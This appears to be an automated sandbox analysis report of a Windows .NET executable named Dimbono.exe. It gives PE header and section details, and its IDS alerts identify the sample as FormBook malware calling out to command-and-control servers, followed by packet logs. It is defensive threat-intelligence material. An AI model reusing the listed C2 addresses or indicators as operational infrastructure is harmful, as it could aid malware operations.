                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0.............~.... ........@.. ....................... .......n....@................................

                                                                                                File Icon

                                                                                                Icon Hash:fae2d8f4f0d8d2c4

                                                                                                Static PE Info

                                                                                                General

                                                                                                Entrypoint:0x40c27e
                                                                                                Entrypoint Section:.text
                                                                                                Digitally signed:true
                                                                                                Imagebase:0x400000
                                                                                                Subsystem:windows gui
                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                                Time Stamp:0xEDF52E0E [Wed Jul 4 19:25:02 2096 UTC]
                                                                                                TLS Callbacks:
                                                                                                CLR (.Net) Version:v4.0.30319
                                                                                                OS Version Major:4
                                                                                                OS Version Minor:0
                                                                                                File Version Major:4
                                                                                                File Version Minor:0
                                                                                                Subsystem Version Major:4
                                                                                                Subsystem Version Minor:0
                                                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                Authenticode Signature

                                                                                                Signature Valid:
                                                                                                Signature Issuer:
                                                                                                Signature Validation Error:
                                                                                                Error Number:
                                                                                                Not Before, Not After
                                                                                                  Subject Chain
                                                                                                    Version:
                                                                                                    Thumbprint MD5:
                                                                                                    Thumbprint SHA-1:
                                                                                                    Thumbprint SHA-256:
                                                                                                    Serial:

                                                                                                    Entrypoint Preview

                                                                                                    Instruction
                                                                                                    jmp dword ptr [00402000h]
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al
                                                                                                    add byte ptr [eax], al

                                                                                                    Data Directories

                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xc2280x53.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0xe0000x10e64.rsrc
                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0xae000x14f8
                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x200000xc.reloc
                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                    Sections

                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                    .text0x20000xa2840xa400False0.322575266768data5.26476752262IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                    .rsrc0xe0000x10e640x11000False0.120777803309data3.67778786605IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                    .reloc0x200000xc0x200False0.044921875data0.0815394123432IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                    Resources

                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                    RT_ICON0xe1300x10828dBase III DBT, version number 0, next free block index 40
                                                                                                    RT_GROUP_ICON0x1e9580x14data
                                                                                                    RT_VERSION0x1e96c0x30cdata
                                                                                                    RT_MANIFEST0x1ec780x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                                                                                    Imports

                                                                                                    DLLImport
                                                                                                    mscoree.dll_CorExeMain

                                                                                                    Version Infos

                                                                                                    DescriptionData
                                                                                                    Translation0x0000 0x04b0
                                                                                                    LegalCopyrightCopyright 2021
                                                                                                    Assembly Version1.0.0.0
                                                                                                    InternalNameDimbono.exe
                                                                                                    FileVersion1.0.0.0
                                                                                                    CompanyName
                                                                                                    LegalTrademarks
                                                                                                    Comments
                                                                                                    ProductNameDimbono
                                                                                                    ProductVersion1.0.0.0
                                                                                                    FileDescriptionDimbono
                                                                                                    OriginalFilenameDimbono.exe

                                                                                                    Network Behavior

                                                                                                    Snort IDS Alerts

                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                    04/08/21-13:31:01.519802TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.4185.199.108.153
                                                                                                    04/08/21-13:31:01.519802TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.4185.199.108.153
                                                                                                    04/08/21-13:31:01.519802TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974580192.168.2.4185.199.108.153
                                                                                                    04/08/21-13:31:12.230396TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.452.15.160.167
                                                                                                    04/08/21-13:31:12.230396TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.452.15.160.167
                                                                                                    04/08/21-13:31:12.230396TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976280192.168.2.452.15.160.167
                                                                                                    04/08/21-13:31:17.628393TCP1201ATTACK-RESPONSES 403 Forbidden804976334.102.136.180192.168.2.4
                                                                                                    04/08/21-13:31:22.719682TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.481.88.57.70
                                                                                                    04/08/21-13:31:22.719682TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.481.88.57.70
                                                                                                    04/08/21-13:31:22.719682TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976480192.168.2.481.88.57.70
                                                                                                    04/08/21-13:31:28.944856TCP1201ATTACK-RESPONSES 403 Forbidden8049765154.210.110.99192.168.2.4
                                                                                                    04/08/21-13:31:50.143713TCP2031453ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.485.17.172.1
                                                                                                    04/08/21-13:31:50.143713TCP2031449ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.485.17.172.1
                                                                                                    04/08/21-13:31:50.143713TCP2031412ET TROJAN FormBook CnC Checkin (GET)4976880192.168.2.485.17.172.1
                                                                                                    04/08/21-13:31:55.836994TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4123.31.43.181
                                                                                                    04/08/21-13:31:55.836994TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4123.31.43.181
                                                                                                    04/08/21-13:31:55.836994TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977180192.168.2.4123.31.43.181
                                                                                                    04/08/21-13:32:01.286479TCP1201ATTACK-RESPONSES 403 Forbidden804977234.102.136.180192.168.2.4
                                                                                                    04/08/21-13:32:11.499423TCP2031453ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                                                    04/08/21-13:32:11.499423TCP2031449ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                                                    04/08/21-13:32:11.499423TCP2031412ET TROJAN FormBook CnC Checkin (GET)4977480192.168.2.434.102.136.180
                                                                                                    04/08/21-13:32:11.618188TCP1201ATTACK-RESPONSES 403 Forbidden804977434.102.136.180192.168.2.4
                                                                                                    04/08/21-13:32:16.857335TCP1201ATTACK-RESPONSES 403 Forbidden804977534.102.136.180192.168.2.4

                                                                                                    Network Port Distribution

                                                                                                    TCP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Apr 8, 2021 13:30:05.191323996 CEST4972680192.168.2.4172.67.150.212
                                                                                                    Apr 8, 2021 13:30:05.221245050 CEST8049726172.67.150.212192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.221424103 CEST4972680192.168.2.4172.67.150.212
                                                                                                    Apr 8, 2021 13:30:05.222027063 CEST4972680192.168.2.4172.67.150.212
                                                                                                    Apr 8, 2021 13:30:05.251811028 CEST8049726172.67.150.212192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.302162886 CEST8049726172.67.150.212192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.346678019 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.364352942 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.364466906 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.382594109 CEST4972680192.168.2.4172.67.150.212
                                                                                                    Apr 8, 2021 13:30:05.424293041 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.442240953 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.449045897 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.449109077 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.449263096 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.457266092 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.474929094 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.475277901 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.523251057 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.542202950 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.559737921 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776842117 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776860952 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776876926 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776899099 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776916027 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776926041 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776941061 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776952028 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.776962042 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.776992083 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.777034998 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.777045012 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.777091980 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:05.777156115 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.777173996 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.777219057 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.050187111 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050219059 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050244093 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050260067 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050307035 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.050350904 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050353050 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.050376892 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050393105 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050436020 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.050718069 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050739050 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050781965 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.050889969 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050913095 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.050940037 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.051059961 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.051094055 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.051115990 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.051866055 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.051937103 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.051949978 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.051975012 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.051990986 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.052021980 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.052701950 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.052723885 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.052769899 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.052783012 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.052787066 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.052824974 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.053375959 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.053423882 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.053447008 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.053493977 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.053509951 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.053540945 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.054260015 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.054279089 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.054328918 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.054331064 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.054351091 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.054375887 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.055016041 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.055039883 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.055077076 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.055129051 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.055166960 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.055170059 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.055993080 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056014061 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056056023 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.056080103 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056097984 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056122065 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.056751966 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056806087 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056823015 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056822062 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.056842089 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.056886911 CEST49727443192.168.2.4104.21.56.119
                                                                                                    Apr 8, 2021 13:30:06.067821026 CEST44349727104.21.56.119192.168.2.4
                                                                                                    Apr 8, 2021 13:30:06.067859888 CEST44349727104.21.56.119192.168.2.4

                                                                                                    UDP Packets

                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Apr 8, 2021 13:29:56.888344049 CEST6524853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:56.901118994 CEST53652488.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:29:56.927057981 CEST5372353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:56.939779997 CEST53537238.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:29:57.024849892 CEST6464653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:57.051279068 CEST53646468.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:29:58.104240894 CEST6529853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:58.116851091 CEST53652988.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:29:59.215184927 CEST5912353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:59.228852987 CEST53591238.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:29:59.558557034 CEST5453153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:29:59.576720953 CEST53545318.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:00.177397966 CEST4971453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:00.190432072 CEST53497148.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:01.356641054 CEST5802853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:01.369630098 CEST53580288.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:02.680725098 CEST5309753192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:02.693494081 CEST53530978.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:03.818811893 CEST4925753192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:03.831569910 CEST53492578.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.109535933 CEST6238953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:05.130899906 CEST4991053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:05.144030094 CEST53499108.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.163789034 CEST53623898.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:05.314856052 CEST5585453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:05.337465048 CEST53558548.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:09.727493048 CEST6454953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:09.740129948 CEST53645498.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:10.921067953 CEST6315353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:10.934398890 CEST53631538.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:12.116672993 CEST5299153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:12.129201889 CEST53529918.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:13.917656898 CEST5370053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:13.929677010 CEST53537008.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:15.172684908 CEST5172653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:15.185151100 CEST53517268.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:16.224628925 CEST5679453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:16.238075018 CEST53567948.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:17.248979092 CEST5653453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:17.261476994 CEST53565348.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:18.722178936 CEST5662753192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:18.735626936 CEST53566278.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:21.003348112 CEST5662153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:21.016817093 CEST53566218.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:23.643181086 CEST6311653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:23.655811071 CEST53631168.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:24.777617931 CEST6407853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:24.790734053 CEST53640788.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:30.193873882 CEST6480153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:30.206377029 CEST53648018.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:31.343394041 CEST6172153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:31.379508018 CEST53617218.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:42.384252071 CEST5125553192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:42.404385090 CEST53512558.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:30:51.828886986 CEST6152253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:30:51.871371031 CEST53615228.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:01.028156996 CEST5233753192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:01.126770020 CEST53523378.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:01.450838089 CEST5504653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:01.492580891 CEST53550468.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:01.603812933 CEST4961253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:01.617043972 CEST53496128.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:02.062634945 CEST4928553192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:02.212533951 CEST53492858.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:02.612077951 CEST5060153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:02.617250919 CEST6087553192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:02.631309986 CEST53608758.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:02.639549971 CEST53506018.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:03.093561888 CEST5644853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:03.229572058 CEST53564488.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:03.842832088 CEST5917253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:03.972584009 CEST53591728.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:04.413518906 CEST6242053192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:04.430625916 CEST53624208.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:05.123347998 CEST6057953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:05.136368036 CEST53605798.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:06.643285990 CEST5018353192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:06.752841949 CEST53501838.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:06.799638987 CEST6153153192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:06.812411070 CEST53615318.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:07.300843000 CEST4922853192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:07.314244032 CEST53492288.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:10.546406031 CEST5979453192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:10.564167976 CEST53597948.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:11.974248886 CEST5591653192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:12.117747068 CEST53559168.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:17.383276939 CEST5275253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:17.496551991 CEST53527528.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:22.644455910 CEST6054253192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:22.701051950 CEST53605428.8.8.8192.168.2.4
                                                                                                    Apr 8, 2021 13:31:27.764228106 CEST6068953192.168.2.48.8.8.8
                                                                                                    Apr 8, 2021 13:31:28.055814981 CEST53606898.8.8.8192.168.2.4
